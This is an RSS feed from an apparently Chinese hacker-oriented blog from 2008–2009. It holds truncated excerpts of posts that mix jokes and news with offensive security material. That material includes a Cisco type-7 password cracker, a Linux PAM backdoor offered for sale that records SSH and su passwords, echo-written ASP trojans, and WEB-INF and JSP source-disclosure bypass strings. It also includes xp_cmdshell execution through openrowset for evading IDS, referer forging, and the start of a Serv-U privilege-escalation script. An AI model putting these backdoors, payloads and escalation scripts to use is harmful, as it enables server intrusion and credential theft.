<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>既然已经失去了进入天堂寻觅幸福的资格..那么就让我沉沦地狱吧!</title><link>http://blog.donews.com/yanhuajianke/</link><description>学习再学习</description><dc:language>zh-CHS</dc:language><generator>.Text Version 1.0.1.0</generator><item><dc:creator>烟花剑客</dc:creator><title>小比喻</title><link>http://blog.donews.com/yanhuajianke/archive/2009/01/05/1436652.aspx</link><pubDate>Mon, 05 Jan 2009 12:11:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2009/01/05/1436652.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1436652.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2009/01/05/1436652.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1436652.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1436652</trackback:ping><description>&lt;div id="blogDetailDiv" style="FONT-SIZE: 16px; LINE-HEIGHT: 13.5pt"&gt;猪通过勤劳致富有5元钱存在老鼠开的钱庄里。&lt;br /&gt;猪打算拿这5元钱建一个小窝，大盖要花2元卖地，花3元搭窝。&lt;br /&gt;王八是搞工程的，他想在猪身上挣更多的钱，于是找来当投资顾问的狐狸想办法，&lt;br /&gt;狐狸说：这好办。于是找来管地盘的狼，开钱庄的老鼠一起来商议，结果王八从老鼠那里借来200元，用100元买了狼的地，花了3元把猪窝盖好，花了50元给了狐狸咨询服务费，&lt;br /&gt;猪没有地，只好求王八把窝卖给它，王八要价500元，老猪说只有5元买不起，&lt;br /&gt;这时候狐狸说服猪去向老鼠借钱，老鼠答应借500给猪，前提是要他连本带利还600元，可以分10年还清，&lt;br /&gt;并且产权证拿来抵押。结果成交。猪到最后花了600元买来了猪窝，比他原来的计划高了110倍，&lt;br /&gt;猪努力了十年去挣钱还贷。在这场交易里面，狼，老鼠，狐狸还有王八都挣了钱。&lt;br /&gt;以后他们就如法炮制。更多的猪去贷款买房子了，这时候，当商人的驴看到有机可乘，到老鼠那里贷了好多好&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1436652.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>番茄花园</title><link>http://blog.donews.com/yanhuajianke/archive/2008/10/20/1363981.aspx</link><pubDate>Mon, 20 Oct 2008 10:19:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/10/20/1363981.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1363981.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/10/20/1363981.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1363981.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1363981</trackback:ping><description>&lt;div class="lh3" id="veryContent" style="OVERFLOW: hidden; WIDTH: 100%"&gt;
&lt;table id="blogContentTable" cellspacing="0" cellpadding="0" class="contentTable"&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td style="WORD-WRAP: break-word" valign="top"&gt;
            &lt;div id="blogContainer" style="FONT-SIZE: 12px"&gt;&lt;img id="paperPicArea0" style="DISPLAY: none" src="http://imgcache.qq.com/ac/b.gif" alt="" /&gt;
            &lt;div id="paperTitleArea" style="DISPLAY: none" align="center"&gt;&lt;span id="paperTitle" sty&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1363981.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>淘宝最搞笑的评价</title><link>http://blog.donews.com/yanhuajianke/archive/2008/09/02/1341606.aspx</link><pubDate>Tue, 02 Sep 2008 00:02:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/09/02/1341606.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1341606.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/09/02/1341606.aspx#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1341606.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1341606</trackback:ping><description>&lt;font size="2"&gt;清脂减肥胶囊400mg*60粒&lt;/font&gt;&lt;font style="LINE-HEIGHT: 1.3em" size="2"&gt; &lt;br /&gt;　　差评 [详情] 骗人，我拍的是一瓶。他却发一颗，那有吃1颗就减肥的，顺属欺诈&lt;/font&gt;&lt;font size="2"&gt;&lt;font style="LINE-HEIGHT: 1.3em"&gt;2007.04.03 19:50 &lt;br /&gt;　&lt;/font&gt;&lt;font style="LINE-HEIGHT: 1.3em"&gt;　&lt;font style="LINE-HEIGHT: 1.3em" color="#ff0000"&gt;解释：&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;font style="LINE-HEIGHT: 1.3em"&gt;&lt;font size="2"&gt;&lt;font style="LINE-HEIGHT: 1.3em" color="#ff0000"&gt; &lt;/font&gt;&lt;br /&gt;&lt;font style="LINE-HEIGHT: 1.3em" color="#ff0000"&gt;　　哦对不起，到昨天我才知道，我用的这个快&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1341606.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>Multiple Vulnerabilities in AWStats Totals</title><link>http://blog.donews.com/yanhuajianke/archive/2008/09/01/1341245.aspx</link><pubDate>Mon, 01 Sep 2008 01:25:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/09/01/1341245.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1341245.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/09/01/1341245.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1341245.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1341245</trackback:ping><description>&lt;div style="WIDTH: 100%"&gt;
&lt;div class="modbox" id="m_blog"&gt;
&lt;div class="date"&gt;&lt;/div&gt;
&lt;table style="TABLE-LAYOUT: fixed"&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;
            &lt;div class="cnt" id="blog_text"&gt;
            &lt;table style="WIDTH: 100%" border="0"&gt;
                &lt;tbody&gt;
                    &lt;tr align="left"&gt;
                        &lt;td&gt;&lt;a href="http://www.telartis.nl/xcms/awstats/"&gt;AWStats Totals&lt;/a&gt; is &amp;quot;a simple php script to view the AWStats totals (Unique visitors, N&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1341245.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>cisco password7方式的密码破解程序</title><link>http://blog.donews.com/yanhuajianke/archive/2008/08/10/1333963.aspx</link><pubDate>Sun, 10 Aug 2008 00:36:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/08/10/1333963.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1333963.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/08/10/1333963.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1333963.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1333963</trackback:ping><description>&lt;p&gt;/*&lt;br /&gt;* * descambles cisco IOS type-7 passwords&lt;br /&gt;* * found somewhere on the internet, slightly modified, &lt;a href="mailto:anonymous@segfault.net"&gt;anonymous@segfault.net&lt;/a&gt;&lt;br /&gt;* *&lt;br /&gt;* * gcc -Wall -o ciscocrack ciscocrack.c&lt;br /&gt;* * ./ciscocrack 01178E05590909022A&lt;br /&gt;* *&lt;br /&gt;* */&lt;/p&gt;
&lt;p&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;#include &amp;lt;ctype.h&amp;gt;&lt;/p&gt;
&lt;p&gt;char xlat[] = {&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbs&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1333963.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>全力关注bct开张中</title><link>http://blog.donews.com/yanhuajianke/archive/2008/08/01/1331598.aspx</link><pubDate>Fri, 01 Aug 2008 17:05:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/08/01/1331598.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1331598.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/08/01/1331598.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1331598.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1331598</trackback:ping><description>&amp;nbsp;&amp;nbsp; 期待最近bct重新开张&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1331598.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>卡巴斯基网站被黑客攻破</title><link>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx</link><pubDate>Wed, 23 Jul 2008 17:56:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1323898.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/07/23/1323898.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1323898.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1323898</trackback:ping><description>&lt;p&gt;&amp;nbsp; 牛人无数，sql无处不在啊！&lt;/p&gt;
&lt;p&gt;北京时间7月22日消息，据国外媒体报道，俄罗斯信息安全厂商卡巴斯基实验室的马拉西亚网站周六被黑客攻破，相关的一个网络购物站点也受到影响。&lt;/p&gt;
&lt;p&gt;　　网络安全组织Zone-H记录了这次攻击。 &lt;br /&gt;　　&lt;br /&gt;　　记录显示，攻击者昵称为&amp;ldquo;m0sted&amp;rdquo;，攻击采用了&amp;ldquo;SQL注入&amp;rdquo;的方式。卡巴斯基随后关闭了该网站，该网站采用的是微软的IIS网络服务器。随后该网站不再面向所有用户开放，在接入前要求输入用户名和密码。&lt;/p&gt;
&lt;p&gt;　　Zone-H同时公布了卡巴斯基该网站被攻破之后的截图。卡巴斯基尚未对这一事件发表评论，不过Zone-H表示，由于此次的攻击仅仅是以破坏为目的，因此未来还有可能出现更严重的安全风险。&lt;/p&gt;
&lt;p&gt;　　卡巴斯基在该网站上提供评估版的安全软件下载，因此攻击者有可能以卡巴斯基的名义在该网站上发布恶意软件，这将对用户造成巨大威胁。&lt;/p&gt;&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1323898.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>linux pam后门</title><link>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx</link><pubDate>Mon, 23 Jun 2008 21:45:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1310928.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/06/23/1310928.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1310928.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1310928</trackback:ping><description>&lt;p&gt;&amp;nbsp; 废话不多说了,直接把动画txt写上,要的联系,货真价实的.联系qq:909473606&lt;/p&gt;
&lt;p&gt;1.安装&lt;br /&gt;编译好后，cp过去文件即可&lt;br /&gt;有的发行版本，会自己做自己的发行版so，所以一般来说，我们都先在自己机器上编译好后门传上去&lt;br /&gt;linux一般来说发行版比较多，所以我们在安装后门之前，最好在本地搭建个类似的环境实验，这样不容易丢鸡&lt;/p&gt;
&lt;p&gt;我现在要安装后门的机器是fc4 具体内核没啥限制 应用层后门就这点好，呵呵&lt;/p&gt;
&lt;p&gt;安装&lt;br /&gt;我已经编译好了&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;安装完毕，那个so穿上去就行了&lt;br /&gt;这是我们的后门&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;注意吧pam_unix.so文件的属性改的和别的so属性一样。我这里本来就是一样的，我就不改了。&lt;/p&gt;
&lt;p&gt;OK，安装完毕&lt;/p&gt;
&lt;p&gt;现在看看他有什么功能&lt;/p&gt;
&lt;p&gt;1.记录密码&lt;br /&gt;这个后门可以记录所有登录sshd的用户密码，以及su的密码，默认，没开启记录功能。开启方法如下&lt;/p&gt;
&lt;p&gt;我们开启&lt;/p&gt;
&lt;p&gt;touch &lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1310928.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>天才学生</title><link>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx</link><pubDate>Fri, 02 May 2008 21:26:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1285574.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/05/02/1285574.aspx#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1285574.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1285574</trackback:ping><description>1.某次考试考语文，我的同桌在默词的时候突然灵感来了~前句：问君能有几多愁，要求补后句，他补了句：恰似一道红叉卷上留（原句：恰似一江春水向东流）。老师毫不客气得在卷上打了个X。他还沾沾自喜说：&amp;ldquo;原来我的灵感好灵的！&amp;rdquo;&lt;br /&gt;&lt;br /&gt;2.也是语文考试默词，题目是：玉不琢，不成器。结果我们班一强人答：朋友妻，不客气，第二天家长就被叫到学校了。&lt;br /&gt;&lt;br /&gt;3.又是语文考试，题目：长江后浪推前浪； 某人答：一代更比一代浪。结果自然是家长又见校长。&lt;br /&gt;&lt;br /&gt;4.高中的时候考试有道题是这样的：请写出鲁迅先生的作品《藤野先生》中藤野先生的全名。其答案如下：藤野菜菜子，藤野英二狼， （当时正好有放棒球英豪这个动画片）藤野武大郎，藤野花道，藤野五十六，藤野内丰，藤野隆史等等等等，比较绝的有：藤野小绵羊，气的老师在广播里骂我们无知。&lt;br /&gt;&lt;br /&gt;5.一题曰&amp;ldquo;清水出芙蓉&amp;rdquo;，有人居然答到&amp;ldquo;乱世出英雄&amp;rdquo;，或答&amp;ldquo;山村出美女&amp;rdquo;，或答&amp;ldquo;深海出蛟龙&amp;rdquo;&amp;hel&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1285574.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER</title><link>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx</link><pubDate>Fri, 25 Apr 2008 17:52:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1283214.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/04/25/1283214.aspx#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1283214.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1283214</trackback:ping><description>HTTP-REFERER这个变量已经越来越不可靠了，完全就是可以伪造出来的东东。&lt;br /&gt;&lt;br /&gt;以下是伪造方法：&lt;br /&gt;&lt;br /&gt;ASP/Visual Basic代码&lt;br /&gt;dim http &lt;br /&gt;set http=server.createobject(&amp;quot;MSXML2.XMLHTTP&amp;quot;) '//MSXML2.serverXMLHTTP也可以 &lt;br /&gt;Http.open &amp;quot;GET&amp;quot;,url,false &lt;br /&gt;Http.setRequestHeader &amp;quot;Referer&amp;quot;,&amp;quot;&lt;a href="http://www.dc9.cn/&amp;quot;" target="_blank"&gt;http://www.dc9.cn/&amp;quot;&lt;/a&gt; &lt;br /&gt;Http.send() &lt;br /&gt;&lt;br /&gt;PHP(前提是装了curl):&lt;br /&gt;&lt;br /&gt;PHP代码&lt;br /&gt;$ch = curl_init(); &lt;br /&gt;curl_setopt ($ch, CURLOPT_URL, &amp;quot&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1283214.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>Do All in Cmd Shell</title><link>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx</link><pubDate>Sun, 16 Mar 2008 05:23:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1263827.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263827.aspx#Feedback</comments><slash:comments>4</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1263827.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1263827</trackback:ping><description>Cmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;文件传输&lt;br /&gt;对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：&lt;br /&gt;&lt;br /&gt;1，用Echo命令写ASP木马。&lt;br /&gt;前提当然是目标主机上已经安装了IIS。&lt;br /&gt;一般的ASP木马&amp;quot;体积&amp;quot;较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。&lt;br /&gt;直接给出echo版：&lt;br /&gt;&lt;br /&gt;@echo ^ &amp;gt;up.asp&lt;br /&gt;&lt;br /&gt;注意，只有一行，中间没有回车符。&lt;br /&gt;生成的up.asp不能用浏览器访问，只&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1263827.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>J2ee web渗透</title><link>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx</link><pubDate>Sun, 16 Mar 2008 02:15:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1263812.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/03/16/1263812.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1263812.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1263812</trackback:ping><description>&lt;p&gt;J2EE的WEB，都有一个WEB-INF的目录，这个目录下有所有的WEB配置文件，数据库配置文件和java二进制文件class文件。有很多站因为配置错误或者是默认配置，导致WEB-INF目录可浏览。通常一些J2EE WEB平台还有些通用的限制绕过漏洞&lt;/p&gt;
&lt;p&gt;/WEB-INF../&amp;nbsp;&amp;nbsp;&amp;nbsp; /WEB-INF..%5C&lt;/p&gt;
&lt;p&gt;J2EE的程序访问是通过配置文件里的路径设定实现的，&amp;quot;/xxx.do&amp;quot;,并不代表目录下有xxx.do这个文件。&lt;/p&gt;
&lt;p&gt;JSP的注射，现在已经有些工具可以实现，手工就没必要介绍了。但jsp有一些通用的源码泄露漏洞（一些流行的JSP WEB平台现在已经没这些漏洞了，低版本的还是有。如果看到是些不常见的JSP服务器，可以试一下）&lt;/p&gt;
&lt;p&gt;.jsP .Jsp .jSp .JSP .jsp%2e .jsp%20 .jsp%80 .jsp%81.....jsp%89&lt;/p&gt;
&lt;p&gt;关于HTTP访问和SSL访问差异，在有些情况下，WWW和SSL对WEB的访问，采取的是不同的配置。比如WEB&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1263812.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>好个艳照门</title><link>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx</link><pubDate>Mon, 25 Feb 2008 03:35:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1255622.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/02/25/1255622.aspx#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1255622.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1255622</trackback:ping><description>&amp;nbsp;忽然发现1个多月前替代就给我几张此照片，我还笑他是ps的，这傻！&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1255622.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>躲避IDS</title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx</link><pubDate>Wed, 16 Jan 2008 22:58:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1246868.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/16/1246868.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1246868.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1246868</trackback:ping><description>1．关于openrowset和opendatasource &lt;br /&gt;&lt;br /&gt;　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是（包括MSDN的列子）如下： &lt;br /&gt;select * from openrowset('sqloledb','myserver';'sa';'','select * from table') &lt;br /&gt;&lt;br /&gt;　　可见（即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。&lt;br /&gt;&lt;br /&gt;　　那么我们能不能利用它调用xp_cmdshell呢？答案是肯定的！ &lt;br /&gt;select * from openrowset('sqloledb','server';'sa';'','set fmtonly off exec master.dbo.xp_cmdshel l ''dir c:\''') &lt;br /&gt;必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的o&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1246868.aspx" width = "1" height = "1" /&gt;</description></item><item><dc:creator>烟花剑客</dc:creator><title>SU6.x提权脚本 </title><link>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx</link><pubDate>Tue, 15 Jan 2008 10:03:00 GMT</pubDate><guid>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx</guid><wfw:comment>http://blog.donews.com/yanhuajianke/comments/1246356.aspx</wfw:comment><comments>http://blog.donews.com/yanhuajianke/archive/2008/01/15/1246356.aspx#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://blog.donews.com/yanhuajianke/comments/commentRss/1246356.aspx</wfw:commentRss><trackback:ping>http://tb.donews.net/TrackBack.aspx?PostId=1246356</trackback:ping><description>Serv-U 6.X 提权脚本&lt;br /&gt;使用方法：如果是6.4以下的保持默认即可，只要按你的需要修改执行的命令即可！如果为6.4请在&amp;quot;服务器端口&amp;quot;里填21，然后再在&amp;quot;服务器IP&amp;quot;中填写服务器的真实IP。&lt;br /&gt;复制内容到剪贴板代码:&lt;br /&gt;&amp;lt;%@ LANGUAGE = VBScript %&amp;gt;&lt;br /&gt;&amp;lt;%&lt;br /&gt;Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit&lt;br /&gt;dim action&lt;br /&gt;action=request(&amp;quot;action&amp;quot;)&lt;br /&gt;if not isnumeric(action) then response.end&lt;br /&gt;user = trim(request(&amp;quot;u&amp;quot;))&lt;br /&gt;pass = trim(request(&amp;quot;p&amp;quot;))&lt;br /&gt;port = trim(reque&lt;img src ="http://blog.donews.com/yanhuajianke/aggbug/1246356.aspx" width = "1" height = "1" /&gt;</description></item></channel></rss>